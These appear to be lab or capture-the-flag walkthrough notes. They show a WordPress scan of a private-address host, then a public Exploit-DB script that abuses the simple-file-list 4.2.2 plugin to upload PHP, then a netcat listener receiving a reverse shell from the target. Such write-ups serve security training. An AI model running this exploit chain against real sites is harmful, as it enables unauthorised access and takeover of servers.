3 :80 wordpress + exploit

$ wpscan --url http://192.168.197.105
+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.46 (Unix) PHP/7.4.10
 |  - X-Powered-By: PHP/7.4.10

[+] WordPress readme found: http://192.168.197.105/readme.html

[+] Upload directory has listing enabled: http://192.168.197.105/wp-content/uploads/

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).

[+] WordPress theme in use: news-vibrant
 | Location: http://192.168.197.105/wp-content/themes/news-vibrant/
 | Readme: http://192.168.197.105/wp-content/themes/news-vibrant/readme.txt
 | [!] The version is out of date, the latest version is 1.0.13
 | Version: 1.0.12 (80% confidence)
 
[i] Plugin(s) Identified:
[+] simple-file-list
 | Location: http://192.168.197.105/wp-content/plugins/simple-file-list/
 | [!] The version is out of date, the latest version is 4.4.7
 | Version: 4.2.2 (100% confidence)
 
[+] tutor
 | Location: http://192.168.197.105/wp-content/plugins/tutor/
 | [!] The version is out of date, the latest version is 1.9.7
 | Version: 1.5.3 (80% confidence)
 
[i] User(s) Identified:
[+] admin

# found exploits for simple-file-list v4.2.2
https://www.exploit-db.com/exploits/48449
Using https://www.exploit-db.com/exploits/48979

$ python3 48979.py http://192.168.197.105/
[ ] File 5527.png generated with password: 31f4eeea51f385510ec7328adf61ebd4
[ ] File uploaded at http://192.168.197.105//wp-content/uploads/simple-file-list/5527.png
[ ] File moved to http://192.168.197.105//wp-content/uploads/simple-file-list/5527.php
[+] Exploit seem to work.
[*] Confirmning ...

$ nc -lvnp 3306
listening on [any] 3306 ...
connect to [192.168.49.197] from (UNKNOWN) [192.168.197.105] 43822
bash: cannot set terminal process group (348): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
http
uid=33(http) gid=33(http) groups=33(http)
nukem
Linux nukem 5.8.9-arch2-1 #1 SMP PREEMPT Sun, 13 Sep 2020 23:44:55 +0000 x86_64 GNU/Linux